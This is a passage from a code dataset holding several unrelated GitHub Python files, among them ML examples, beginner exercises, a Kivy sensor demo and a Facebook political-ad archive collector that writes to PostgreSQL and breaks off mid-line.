threaded=True)\n\n","repo_name":"Mahmoudshee/AirBnB_clone_v3","sub_path":"api/v1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70652463554","text":"import pandas as pd\r\nfrom sklearn import linear_model\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\n\r\ndf = pd.read_csv('homeprice.csv')\r\nprint(df)\r\n\r\nplt.xlabel('area')\r\nplt.ylabel('price')\r\nplt.grid()\r\nplt.scatter(df.area, df.price, color='blue', marker='*')\r\nplt.show()\r\n\r\nnew_df = df.drop('price', axis=\"columns\")\r\nprint(new_df)\r\n\r\nprice = df.price\r\nprint(type(price))\r\nnp.array(price)\r\n\r\nreg = linear_model.LinearRegression()\r\nreg.fit(new_df, price)\r\nprint(reg.predict([[4500]]))\r\nprint(reg.coef_)\r\nprint(reg.intercept_)\r\n\r\narea_df = pd.read_csv('area.csv')\r\narea_df.head()\r\n\r\np = reg.predict(area_df)\r\nprint(p)\r\narea_df['predicted_prices'] = p\r\nprint(area_df)\r\n\r\narea_df.to_csv('prediction.csv')\r\n\r\n","repo_name":"hasibarrafiul/AI-Problems","sub_path":"linearRegression.py","file_name":"linearRegression.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33126956163","text":"#1\ndef pypart(n):\n for i in range(0, n):\n for j in range(0, i + 1):\n print(\"*\", end=\" \")\n print(\"\\r\")\nn = 5\npypart(n)\n\n#2\ndef pypart1(n):\n myList = []\n for i in range(1, n + 1):\n myList.append(\"*\" * i)\n print(\"\\n\".join(myList))\n\nn = 5\npypart1(n)\n\n#3\ndef pypart2(n):\n k = 2*n - 2\n for i in range(0, n):\n for j in range(0, k):\n print(end=\" \")\n k = k - 2\n for j in range(0, i+1):\n print(\"*\", end=\" \")\n print(\"\\r\")\n\nn = 5\npypart2(n)\n\n#4\ndef triangle(n):\n k = 2*n - 2\n for i in range(0, n):\n for j in range(0, k):\n print(end=\" \")\n k = k - 1\n for j in range(0, i+1):\n print(\"*\", end=\" \")\n print(\"\\r\")\n\ntriangle(6)\n\n#5\ndef numpat(n):\n num = 1\n for i in range(0, n):\n num = 1\n for i in range(0, i+1):\n print(num, end=\" \")\n num = num + 1\n print(\"\\r\")\nn = 5\nnumpat(n)\n\n#6\ndef numpat1(n):\n num = 1\n for i in range(0, n):\n for j in range(0, i+1):\n print(num, end=\" \")\n num = num + 1\n print(\"\\r\")\nn = 5\nnumpat1(n)\n\n#7\ndef alphabet(n):\n num = 65\n for i in range(0, n):\n for j in range(0, i+1):\n ch = chr(num)\n print(ch, end=\" \")\n num = num + 1\n print(\"\\r\")\nn = 6\nalphabet(n)\n\n#8\ndef contalpha(n):\n num = 65\n for i in range(0, n):\n for j in range(0, i+1):\n ch = chr(num)\n print(ch, end=\" \")\n num = num + 1\n print(\"\\r\")\nn = 5\ncontalpha(n)\n\n#chaining comparison\nx = 5\nprint(1 < x < 10)\nprint(10 < x < 20)\nprint(x < 10 < x*10 < 100)\nprint(10 > x <= 9)\nprint(5 == x > 4)\n\n#\na, b, c, d, e, f = 0, 5, 12, 0, 15, 15\nexp1 = a <= b < c > d is not e is f\nexp2 = a is d > f is not c\nprint(exp1)\nprint(exp2)\n\n#else with for\nfor i in range(1, 4):\n print(i)\nelse:\n print(\"No Break\")\n\n#\nfor i in range(1, 4):\n print(i)\n break\nelse:\n print(\"No Break\")\n\n#if array consist of even number\ndef contains_even_number(l):\n for eleement in l:\n if eleement % 2 == 0:\n print(\"list contains an even number\")\n break\n else:\n print(\"list does not contain an even number\")\n\nprint(\"\\nFor List 1:\")\ncontains_even_number([1, 9, 8])\nprint(\"\\nFor List 2:\")\ncontains_even_number([1, 3, 5])\n\n#\ncount = 0\nwhile (count < 1):\n count = count + 1\n print(count)\n break\nelse:\n print(\"No Break\")\n\n#dictionary mapping\ndef numbers_to_strings(argument):\n switcher = {\n 0: 'zero',\n 1: 'one',\n 2: 'two',\n }\n return switcher.get(argument, 'nothing')\n\nif __name__ == \"__main__\":\n argument = 2\n print(numbers_to_strings(argument))\n","repo_name":"imradhetiwari/python","sub_path":"pyramid.py","file_name":"pyramid.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25176020945","text":"from kivy.app import App\nfrom kivy.clock import Clock\nfrom kivy.lang import Builder\nfrom kivy.properties import NumericProperty\nfrom kivy.properties import ObjectProperty\nfrom kivy.uix.boxlayout import BoxLayout\n\n\nBuilder.load_string('''\n#:import barometer plyer.barometer\n:\n barometer: barometer\n orientation: 'vertical'\n padding: '50dp'\n spacing: '20dp'\n\n BoxLayout:\n orientation: 'horizontal'\n size_hint_y: 0.3\n Button:\n id: button_enable\n text: 'Enable'\n disabled: False\n on_release:\n root.enable()\n button_disable.disabled = not button_disable.disabled\n button_enable.disabled = not button_enable.disabled\n Button:\n id: button_disable\n text: 'Disable'\n disabled: True\n on_release:\n root.disable()\n button_disable.disabled = not button_disable.disabled\n button_enable.disabled = not button_enable.disabled\n\n Label:\n text: 'Current pressure:' + str(root.pressure) + ' hPa.'\n\n''')\n\n\nclass BarometerInterface(BoxLayout):\n '''Root Widget.'''\n\n barometer = ObjectProperty()\n pressure = NumericProperty()\n\n def enable(self):\n self.barometer.enable()\n Clock.schedule_interval(self.get_pressure, 1 / 20.)\n\n def disable(self):\n self.barometer.disable()\n Clock.unschedule(self.get_pressure)\n\n def get_pressure(self, dt):\n self.pressure = self.barometer.pressure or self.pressure\n\n\nclass BarometerApp(App):\n\n def build(self):\n return BarometerInterface()\n\n def on_pause(self):\n return True\n\n\nif __name__ == \"__main__\":\n BarometerApp().run()\n","repo_name":"kivy/plyer","sub_path":"examples/barometer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":1476,"dataset":"github-code","pt":"61"} +{"seq_id":"39775420281","text":"from multiprocessing.dummy import Pool as ThreadPool, Lock\n\nnum = 0 # def global num\nlock = Lock()\n\n\ndef test(i):\n print(f\"子进程:{i}\")\n global num\n global lock\n for i in range(100000):\n with lock:\n num += 1\n\n\ndef main():\n p = ThreadPool()\n p.map_async(test, list(range(5)))\n p.close()\n p.join()\n\n print(num)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lotapp/BaseCode","sub_path":"python/5.concurrent/Thread/2.lock_queue/1.thread/1.thread.2.py","file_name":"1.thread.2.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"23403846311","text":"import math\r\n\r\nin_data = open('A-large.in').readlines()\r\nin_data = [x.strip() for x in in_data]\r\nT = int(in_data[0])\r\nin_data = in_data[1:]\r\n\r\ndef step(begin, m):\r\n if begin==1:\r\n return len(m)\r\n count = 0\r\n max_count = len(m)\r\n for i in range(len(m)):\r\n if begin > m[i]:\r\n begin += m[i]\r\n print(begin)\r\n else:\r\n max_count = min(max_count, count + (len(m)-i))\r\n tmp_count = int(math.log2((m[i]-1)/(begin-1)) + 1) + 1\r\n count += (tmp_count-1)\r\n print(tmp_count)\r\n begin = 2 ** (tmp_count - 1) * (begin - 1) + 1 + m[i]\r\n print(begin)\r\n if count > max_count:\r\n return max_count\r\n return count\r\n\r\n\r\nwfile = open('result', 'w')\r\nfor case_no in range(T):\r\n dt = in_data[:2]\r\n in_data = in_data[2:]\r\n begin = int(dt[0].split()[0])\r\n m = [int(x) for x in dt[1].strip().split()]\r\n m.sort()\r\n res = step(begin, m)\r\n output = 'Case #' + str(case_no+1) + ': ' + str(res) + '\\n'\r\n wfile.write(output)\r\n \r\nwfile.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_123/251.py","file_name":"251.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18987441910","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nimport tensorflow as tf\n\n\n\n\n\ndef batch_norm(x, is_training, epsilon=1e-5, decay=0.9, scope=\"batch_norm\",\n parameter_update_device='-1'):\n with tf.device(parameter_update_device):\n var = tf.contrib.layers.batch_norm(x, decay=decay, updates_collections=None, epsilon=epsilon,\n scale=True, is_training=is_training, scope=scope)\n\n return var\n\n\ndef conv2d(x, output_filters, kh=5, kw=5, sh=2, sw=2, stddev=0.02, scope=\"conv2d\",\n parameter_update_device='-1'):\n with tf.variable_scope(scope):\n shape = x.get_shape().as_list()\n\n # W = tf.get_variable('W', [kh, kw, shape[-1], output_filters],\n # initializer=tf.truncated_normal_initializer(stddev=stddev))\n\n W = parameter_variable_creation_with_device_selection('W',shape=[kh, kw, shape[-1], output_filters],\n initializer=tf.truncated_normal_initializer(stddev=stddev),\n parameter_update_device=parameter_update_device)\n\n\n Wconv = tf.nn.conv2d(x, W, strides=[1, sh, sw, 1], padding='SAME')\n\n #biases = tf.get_variable('b', [output_filters], initializer=tf.constant_initializer(0.0))\n biases = parameter_variable_creation_with_device_selection('b',shape=[output_filters],\n initializer=tf.constant_initializer(0.0),\n parameter_update_device=parameter_update_device)\n\n Wconv_plus_b = tf.reshape(tf.nn.bias_add(Wconv, biases), Wconv.get_shape())\n\n return Wconv_plus_b\n\n\ndef deconv2d(x, output_shape, kh=5, kw=5, sh=2, sw=2, stddev=0.02, scope=\"deconv2d\",\n parameter_update_device='-1'):\n with tf.variable_scope(scope):\n # filter : [height, width, output_channels, in_channels]\n input_shape = x.get_shape().as_list()\n # W = tf.get_variable('W', [kh, kw, output_shape[-1], input_shape[-1]],\n # initializer=tf.random_normal_initializer(stddev=stddev))\n W = parameter_variable_creation_with_device_selection('W',shape=[kh, kw, output_shape[-1], input_shape[-1]],\n initializer=tf.random_normal_initializer(stddev=stddev),\n parameter_update_device=parameter_update_device)\n\n deconv = tf.nn.conv2d_transpose(x, W, output_shape=output_shape,\n strides=[1, sh, sw, 1])\n\n # biases = tf.get_variable('b', [output_shape[-1]], initializer=tf.constant_initializer(0.0))\n biases = parameter_variable_creation_with_device_selection('b',shape=[output_shape[-1]],\n initializer=tf.constant_initializer(0.0),\n parameter_update_device=parameter_update_device)\n deconv_plus_b = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())\n\n return deconv_plus_b\n\n\ndef lrelu(x, leak=0.2):\n return tf.maximum(x, leak * x)\n\n\ndef fc(x, output_size, stddev=0.02, scope=\"fc\",\n parameter_update_device='-1'):\n with tf.variable_scope(scope):\n shape = x.get_shape().as_list()\n # W = tf.get_variable(\"W\", [shape[1], output_size], tf.float32,\n # tf.random_normal_initializer(stddev=stddev))\n # b = tf.get_variable(\"b\", [output_size],\n # initializer=tf.constant_initializer(0.0))\n\n W = parameter_variable_creation_with_device_selection(\"W\", shape=[shape[1], output_size],\n initializer=tf.random_normal_initializer(stddev=stddev),\n parameter_update_device=parameter_update_device)\n b = parameter_variable_creation_with_device_selection(\"b\", shape=[output_size],\n initializer=tf.constant_initializer(0.0),\n parameter_update_device=parameter_update_device)\n return tf.matmul(x, W) + b\n\n\ndef init_embedding_dictionary(size, dimension, stddev=0.01, scope=\"generator\",\n parameter_update_device='-1'):\n with tf.variable_scope(scope):\n # return tf.get_variable(\"gen_ebdd_dictionary\", [size, dimension], tf.float32,\n # tf.random_normal_initializer(stddev=stddev))\n\n return parameter_variable_creation_with_device_selection(\"gen_ebdd_dictionary\",shape=[size, dimension],\n initializer=tf.random_normal_initializer(stddev=stddev),\n parameter_update_device=parameter_update_device)\n\n\ndef init_embedding_weights(size, stddev=1, scope=\"generator\", name='tmp',\n parameter_update_device='-1'):\n with tf.variable_scope(scope):\n # init_weight = tf.get_variable(name, size, tf.float32,\n # tf.random_normal_initializer(stddev=stddev))\n init_weight = parameter_variable_creation_with_device_selection(name,shape=size,\n initializer=tf.random_normal_initializer(stddev=stddev),\n parameter_update_device=parameter_update_device)\n\n # if weight_norm_mark==True:\n # init_weight=weight_norm(input=init_weight)\n return init_weight\n\n\ndef weight_norm(input):\n # output=input\n sum_value = tf.reduce_sum(input, axis=1)\n sum_value = tf.expand_dims(sum_value, axis=1)\n # sum_value=tf.transpose(sum_value)\n one_multipliers = tf.ones([1, int(input.shape[1])], dtype=tf.float32)\n sum_value = tf.matmul(sum_value, one_multipliers)\n output = tf.truediv(input, tf.abs(sum_value))\n return output\n\n\ndef conditional_instance_norm(x, ids, labels_num, mixed=False, scope=\"conditional_instance_norm\"):\n with tf.variable_scope(scope):\n shape = x.get_shape().as_list()\n batch_size, output_filters = shape[0], shape[-1]\n scale = tf.get_variable(\"scale\", [labels_num, output_filters], tf.float32, tf.constant_initializer(1.0))\n shift = tf.get_variable(\"shift\", [labels_num, output_filters], tf.float32, tf.constant_initializer(0.0))\n\n mu, sigma = tf.nn.moments(x, [1, 2], keep_dims=True)\n norm = (x - mu) / tf.sqrt(sigma + 1e-5)\n\n batch_scale = tf.reshape(tf.nn.embedding_lookup([scale], ids=ids), [batch_size, 1, 1, output_filters])\n batch_shift = tf.reshape(tf.nn.embedding_lookup([shift], ids=ids), [batch_size, 1, 1, output_filters])\n\n z = norm * batch_scale + batch_shift\n return z\n\n\ndef parameter_variable_creation_with_device_selection(name, shape, initializer,\n parameter_update_device='-1'):\n \"\"\"Helper to create a Variable stored on CPU memory.\n Args:\n name: name of the variable\n shape: list of ints\n initializer: initializer for Variable\n Returns:\n Variable Tensor\n \"\"\"\n with tf.device(parameter_update_device):\n dtype = tf.float32\n var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)\n return var","repo_name":"jiaomiaomiao/zi2zi-master-modified","sub_path":"model/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":7703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12231759772","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport copy\n\nclass Buffed_LSTM(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers, batch_first):\n super().__init__()\n self.lstm = nn.LSTM(input_size=input_size, hidden_size=hidden_size, num_layers=num_layers, batch_first=batch_first)\n\n def forward(self, input, hidden_state=None, cell_state=None):\n if hidden_state is None or cell_state is None:\n output, (hidden, cell) = self.lstm(input)\n else:\n output, (hidden, cell) = self.lstm(input, (hidden_state, cell_state))\n return output, (hidden, cell)\n\nclass DQN_LSTM(nn.Module):\n \"\"\"mini CNN structure\n input -> (conv2d + relu) x 3 -> flatten -> (dense + relu) x 2 -> output\n \"\"\"\n\n def __init__(self, input_dim, output_dim):\n super().__init__()\n c, h, w = input_dim\n\n self.online = nn.Sequential(\n nn.Conv2d(in_channels=c, out_channels=c*2, kernel_size=3, stride=1,padding=1),\n nn.ReLU(),\n nn.Conv2d(in_channels=c*2, out_channels=c*4, kernel_size=3, stride=1,padding=1),\n nn.ReLU(),\n nn.Conv2d(in_channels=c*4, out_channels=c*8, kernel_size=3, stride=1,padding=1),\n nn.ReLU(),\n nn.Conv2d(in_channels=c*8, out_channels=c*8, kernel_size=3, stride=1,padding=1),\n nn.ReLU(),\n nn.Flatten(),\n nn.LazyLinear(256),\n nn.ReLU(),\n # nn.LazyLinear(64),\n Buffed_LSTM(256,256,1,True),\n nn.ReLU(),\n nn.LazyLinear(output_dim)\n )\n\n self.target = copy.deepcopy(self.online)\n\n # Q_target parameters are frozen.\n for p in self.target.parameters():\n p.requires_grad = False\n\n def forward(self, input, model, hidden_state=None, cell_state=None):\n if model == \"online\":\n # print(input.shape)\n features = self.online[:-3](input)\n features = features.unsqueeze(1)\n # print(features.shape)\n # if hidden_state is not None:\n # print(\"hidden before:\", hidden_state.shape)\n output, (hidden, cell) = self.online[-3](features, hidden_state, cell_state)\n # print(\"hidden:\", hidden.shape) \n output = F.relu(output)\n output = self.online[-1](output)\n output = output.squeeze(1)\n return output, (hidden, cell)\n elif model == \"target\":\n features = self.target[:-3](input)\n features = features.unsqueeze(1)\n output, (hidden, cell) = self.target[-3](features, hidden_state, cell_state)\n output = F.relu(output)\n output = self.target[-1](output)\n output = output.squeeze(1)\n return output, (hidden, cell)\n \n","repo_name":"Carton9/The-Learning-Shoal","sub_path":"src/dqn_LSTM.py","file_name":"dqn_LSTM.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70974451715","text":"from urllib.parse import urlparse, parse_qs\nimport json\nimport random\nimport configparser\nfrom collections import namedtuple\nfrom time import sleep\nimport datetime\nimport time\nimport os\nimport sys\nimport psycopg2\nimport psycopg2.extras\nimport facebook\nfrom OpenSSL import SSL\n\nif len(sys.argv) < 2:\n exit(\"Usage:python3 page_id_fb_collector.py page_id_fb_collector.cfg\")\n\nconfig = configparser.ConfigParser()\nconfig.read(sys.argv[1])\n\ncrawl_date = datetime.date.today() \ncountry_code = config['SEARCH']['COUNTRY_CODE']\n\ndef existing_ads(cursor):\n existing_ad_query = \"select archive_id, is_active from ads\"\n cursor.execute(existing_ad_query)\n ad_ids = set()\n active_ads = set()\n for row in cursor:\n ad_ids.add(row['archive_id'])\n if row['is_active'] == True:\n active_ads.add(row['archive_id'])\n \n return (ad_ids, active_ads)\n\ndef existing_demos(cursor):\n existing_demo_group_query = \"select gender, age, id from demo_groups;\"\n cursor.execute(existing_demo_group_query)\n existing_demo_groups = {}\n for row in cursor:\n existing_demo_groups[row['age']+row['gender']] = row['id']\n\n return existing_demo_groups\n\ndef existing_region(cursor):\n existing_regions_query = \"select name, id from regions;\"\n cursor.execute(existing_regions_query)\n existing_regions = {}\n for row in cursor:\n existing_regions[row['name']] = row['id']\n\n return existing_regions\n\ndef existing_page(cursor):\n existing_pages_query = \"select page_id, page_name from pages;\"\n cursor.execute(existing_pages_query)\n existing_pages = set()\n for row in cursor:\n existing_pages.add(row['page_id'])\n\n return existing_pages\n\ndef existing_sponsors(cursor):\n existing_ad_sponsor_query = \"select id, name from ad_sponsors;\"\n cursor.execute(existing_ad_sponsor_query)\n existing_ad_sponsors = {}\n for row in cursor:\n existing_ad_sponsors[row['name']] = row['id']\n\n return existing_ad_sponsors\n\ndef insert_ad_sponsors(cursor, new_ad_sponsors):\n insert_ad_sponsor = \"INSERT INTO ad_sponsors(name) VALUES \"\n ad_sponsor_count = 0\n for ad_sponsor in new_ad_sponsors:\n insert_ad_sponsor += cursor.mogrify(\"(%s),\", (ad_sponsor,)).decode('utf-8')\n ad_sponsor_count += 1\n\n if ad_sponsor_count >= 250:\n insert_ad_sponsor = insert_ad_sponsor[:-1]\n insert_ad_sponsor += \";\"\n #print(cursor.mogrify(insert_ad_sponsor))\n cursor.execute(insert_ad_sponsor)\n insert_ad_sponsor = \"INSERT INTO ad_sponsors(name) VALUES \"\n ad_sponsor_count = 0\n\n if ad_sponsor_count > 0:\n insert_ad_sponsor = insert_ad_sponsor[:-1]\n insert_ad_sponsor += \";\"\n #print(cursor.mogrify(insert_ad_sponsor))\n cursor.execute(insert_ad_sponsor)\n\n\ndef insert_pages(cursor, new_pages):\n insert_page = \"INSERT INTO pages(page_id, page_name) VALUES \"\n page_count = 0\n for page in new_pages:\n insert_page += cursor.mogrify(\"(%s, %s),\",(page.id, page.name)).decode('utf-8')\n page_count += 1\n \n if page_count >= 250:\n insert_page = insert_page[:-1]\n insert_page += \";\"\n #print(cursor.mogrify(insert_page))\n cursor.execute(insert_page)\n insert_page = \"INSERT INTO pages(page_id, page_name) VALUES \"\n page_count = 0\n\n insert_page = insert_page[:-1]\n insert_page += \";\"\n if page_count > 0:\n #print(cursor.mogrify(insert_page))\n cursor.execute(insert_page)\n\ndef insert_regions(cursor, new_regions):\n insert_region = \"INSERT into regions(name) VALUES \"\n region_count = 0\n for region in new_regions:\n insert_region += cursor.mogrify(\"(%s),\",(region,)).decode('utf-8')\n region_count += 1\n \n if region_count >= 250:\n insert_region = insert_region[:-1]\n insert_region += \";\"\n cursor.execute(insert_region)\n insert_region = \"INSERT INTO regions(name) VALUES \"\n region_count = 0\n\n if region_count > 0:\n insert_region = insert_region[:-1]\n insert_region += \";\"\n #print(cursor.mogrify(insert_regions))\n cursor.execute(insert_region)\n\ndef insert_demos(cursor, new_demo_groups):\n insert_demo_groups = \"INSERT INTO demo_groups(age, gender) VALUES \"\n demo_group_count = 0\n for key, val in new_demo_groups.items():\n insert_demo_groups += cursor.mogrify(\"(%s, %s),\",(val[0], val[1])).decode('utf-8')\n demo_group_count += 1\n \n if demo_group_count >= 250:\n insert_demo_groups = insert_demo_groups[:-1]\n insert_demo_groups += \";\"\n #print(cursor.mogrify(insert_demo_groups))\n cursor.execute(insert_demo_groups)\n insert_demo_groups = \"INSERT INTO demo_groups(age, gender) VALUES \"\n demo_group_count = 0\n\n if demo_group_count > 0:\n insert_demo_groups = insert_demo_groups[:-1]\n insert_demo_groups += \";\"\n #print(cursor.mogrify(insert_demo_groups))\n cursor.execute(insert_demo_groups)\n\ndef main(search_term, connection):\n #structures to hold all the new stuff we find\n new_ads = set()\n new_ad_sponsors = set()\n new_pages = set()\n new_demo_groups = {}\n new_regions = set()\n new_impressions = set()\n new_ad_region_impressions = set()\n new_ad_demo_impressions = set()\n\n #cache of ads/pages/regions/demo_groups we've already seen so we don't reinsert them\n (ad_ids, active_ads) = existing_ads(cursor)\n existing_regions = existing_region(cursor)\n existing_demo_groups = existing_demos(cursor)\n existing_pages = existing_page(cursor)\n existing_ad_sponsors = existing_sponsors(cursor)\n\n #get ads\n graph = facebook.GraphAPI(access_token=FB_ACCESS_TOKEN)\n has_next = True\n already_seen = False\n next_cursor = \"\"\n print(datetime.datetime.now())\n print(search_term)\n request_count = 0\n while has_next and not already_seen and request_count < 40:\n request_count += 1\n try:\n results = None\n print(\"making page_id request for \" + str(search_term))\n if not next_cursor:\n sleep(SLEEP_TIME)\n print(\"making request\")\n results = graph.get_object(id='ads_archive', \n ad_reached_countries=country_code, \n ad_type='POLITICAL_AND_ISSUE_ADS',\n ad_active_status='ALL',\n limit=2000,\n search_page_ids=search_term,\n fields=\",\".join(field_list))\n else:\n sleep(SLEEP_TIME * 2)\n print(\"making request\")\n results = graph.get_object(id='ads_archive', \n ad_reached_countries=country_code, \n ad_type='POLITICAL_AND_ISSUE_ADS',\n ad_active_status='ALL',\n limit=2000,\n search_page_ids=search_term,\n fields=\",\".join(field_list),\n after=next_cursor)\n\n except facebook.GraphAPIError as e:\n print(\"Graph Error\")\n print(e.code)\n print(e)\n if results:\n print(results)\n else:\n print(\"No results\")\n if e.code == 4: # this means we've gotten to the FB max results per query\n sleep(240)\n has_next = False\n continue\n else:\n print(\"resetting graph\")\n graph = facebook.GraphAPI(access_token=FB_ACCESS_TOKEN)\n continue\n except OSError as e:\n print(\"OS error: {0}\".format(e))\n print(datetime.datetime.now())\n sleep(60)\n print(\"resetting graph\")\n graph = facebook.GraphAPI(access_token=FB_ACCESS_TOKEN)\n continue\n\n except SSL.SysCallError as e:\n print(\"resetting graph\")\n graph = facebook.GraphAPI(access_token=FB_ACCESS_TOKEN)\n continue\n\n\n old_ad_count = 0 \n total_ad_count = 0\n for result in results['data']:\n total_ad_count += 1\n image_url = result['ad_snapshot_url']\n url_parts = urlparse(image_url)\n archive_id = int(parse_qs(url_parts.query)['id'][0])\n page_id = result['page_id']\n page_name = result['page_name']\n start_date = result['ad_delivery_start_time']\n currency = result['currency']\n ad_text = ''\n if 'ad_creative_body' in result:\n ad_text = result['ad_creative_body']\n ad_sponsor_label = ''\n if 'funding_entity' in result:\n ad_sponsor_label = result['funding_entity']\n\n if ad_sponsor_label not in existing_ad_sponsors:\n new_ad_sponsors.add(ad_sponsor_label)\n\n is_active = True\n end_date = None\n if 'ad_delivery_stop_time' in result:\n end_date = result['ad_delivery_stop_time']\n is_active = False\n\n min_impressions = 0\n max_impressions = 0\n min_spend = 0\n max_spend = 0\n if 'impressions' in result:\n min_impressions = result['impressions']['lower_bound']\n max_impressions = result['impressions']['upper_bound']\n if 'spend' in result:\n min_spend = result['spend']['lower_bound']\n max_spend = result['spend']['upper_bound']\n\n link_caption = ''\n if 'ad_creative_link_caption' in result:\n link_caption = result['ad_creative_link_caption']\n link_description = ''\n if 'ad_creative_link_description' in result:\n link_description = result['ad_creative_link_description']\n link_title = ''\n if 'ad_creative_link_title' in result:\n link_description = result['ad_creative_link_title']\n\n if int(page_id) not in existing_pages:\n new_pages.add(PageRecord(page_id, page_name))\n\n\n parsed_end_date = None\n if end_date:\n parsed_end_date = datetime.datetime.strptime(end_date[:10], '%Y-%m-%d')\n parsed_start_date = None\n if start_date:\n datetime.datetime.strptime(start_date[:10], '%Y-%m-%d')\n\n if not is_active and archive_id in ad_ids:\n old_ad_count += 1\n\n curr_ad = AdRecord(archive_id, \n page_id, \n image_url, \n ad_text,\n ad_sponsor_label,\n start_date, \n start_date, \n end_date, \n is_active, \n min_impressions, \n max_impressions, \n min_spend, \n max_spend,\n currency,\n link_caption,\n link_description,\n link_title)\n\n\n if is_active or archive_id in active_ads or archive_id not in ad_ids:\n new_impressions.add(curr_ad)\n if 'demographic_distribution' not in result:\n print(\"no demo information in:\")\n print(result)\n continue\n \n if 'region_distribution' not in result:\n print(\"no region information in:\")\n print(result)\n continue\n \n for demo_result in result['demographic_distribution']:\n demo_key = demo_result['gender']+demo_result['age']\n if demo_key not in existing_demo_groups:\n new_demo_groups[demo_key] = (demo_result['gender'], demo_result['age'])\n\n new_ad_demo_impressions.add(SnapshotDemoRecord(archive_id,\n demo_result['age'], \n demo_result['gender'], \n float(demo_result['percentage']) * int(min_impressions), \n float(demo_result['percentage']) * int(max_impressions), \n float(demo_result['percentage']) * int(min_spend), \n float(demo_result['percentage']) * int(max_spend), \n crawl_date))\n \n for region_result in result['region_distribution']:\n if region_result['region'] not in existing_regions:\n new_regions.add(region_result['region'])\n new_ad_region_impressions.add(SnapshotRegionRecord(archive_id,\n region_result['region'], \n float(region_result['percentage']) * int(min_impressions), \n float(region_result['percentage']) * int(max_impressions), \n float(region_result['percentage']) * int(min_spend), \n float(region_result['percentage']) * int(max_spend), \n crawl_date))\n\n if archive_id not in ad_ids:\n new_ads.add(curr_ad)\n ad_ids.add(archive_id)\n\n\n #we finished parsing each result\n print(old_ad_count)\n print(\"total ads=\" + str(total_ad_count))\n if total_ad_count > 0 and float(old_ad_count) / float(total_ad_count) > .75:\n already_seen = True\n\n if \"paging\" in results and \"next\" in results[\"paging\"]:\n next_cursor = results[\"paging\"][\"cursors\"][\"after\"]\n else:\n has_next = False\n\n #write new pages, regions, and demo groups to db first so we can update our caches before writing ads\n insert_ad_sponsors(cursor, new_ad_sponsors)\n insert_pages(cursor, new_pages)\n insert_regions(cursor, new_regions)\n insert_demos(cursor, new_demo_groups)\n\n connection.commit()\n existing_regions = existing_region(cursor)\n existing_demo_groups = existing_demos(cursor)\n existing_pages = existing_page(cursor)\n existing_ad_sponsors = existing_sponsors(cursor)\n\n #write new ads to our database\n print(\"writing \" + str(len(new_ads)) + \" to db\")\n ad_insert_query = \"INSERT INTO ads(archive_id, creation_date, start_date, end_date, currency, page_id, snapshot_url, text, ad_sponsor_id, is_active, link_caption, link_description, link_title, country_code) VALUES \"\n ad_count = 0\n for ad in new_ads:\n ad_insert_query += cursor.mogrify(\"(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s),\", (ad.archive_id, ad.creation_date, ad.start_date, ad.end_date, currency, ad.page_id, ad.image_url, ad.text, existing_ad_sponsors[ad.sponsor_label], ad.is_active, ad.ad_creative_link_caption, ad.ad_creative_link_description, ad.ad_creative_link_title, country_code)).decode('utf-8')\n ad_count += 1\n\n if ad_count >= 250:\n ad_insert_query = ad_insert_query[:-1]\n ad_insert_query += \";\"\n #print(cursor.mogrify(ad_insert_query))\n cursor.execute(ad_insert_query)\n ad_insert_query = \"INSERT INTO ads(archive_id, creation_date, start_date, end_date, currency, page_id, snapshot_url, text, ad_sponsor_id, is_active, link_caption, link_description, link_title, country_code) VALUES \"\n ad_count = 0\n\n if ad_count > 0:\n ad_insert_query = ad_insert_query[:-1]\n ad_insert_query += \";\"\n #print(cursor.mogrify(ad_insert_query))\n cursor.execute(ad_insert_query)\n\n\n impressions_insert_query = \"INSERT INTO impressions(ad_archive_id, crawl_date, min_impressions, min_spend, max_impressions, max_spend) VALUES \"\n impression_count = 0\n print(\"writing \" + str(len(new_impressions)) + \" impressions to db\")\n for impression in new_impressions:\n impressions_insert_query += cursor.mogrify(\"(%s, %s, %s, %s, %s, %s),\", (impression.archive_id, crawl_date, impression.min_impressions, impression.min_spend, impression.max_impressions, impression.max_spend)).decode('utf-8')\n impression_count += 1\n\n if impression_count >= 250:\n impressions_insert_query = impressions_insert_query[:-1]\n impressions_insert_query += \";\"\n #print(cursor.mogrify(impressions_insert_query))\n cursor.execute(impressions_insert_query)\n impressions_insert_query = \"INSERT INTO impressions(ad_archive_id, crawl_date, min_impressions, min_spend, max_impressions, max_spend) VALUES \"\n impression_count = 0\n\n if impression_count > 0:\n impressions_insert_query = impressions_insert_query[:-1]\n impressions_insert_query += \";\"\n #print(cursor.mogrify(impressions_insert_query))\n cursor.execute(impressions_insert_query)\n\n impression_demo_insert_query = \"INSERT INTO demo_impressions(ad_archive_id, demo_id, min_impressions, min_spend, max_impressions, max_spend, crawl_date) VALUES \"\n impression_count = 0\n for impression in new_ad_demo_impressions:\n impression_demo_insert_query += 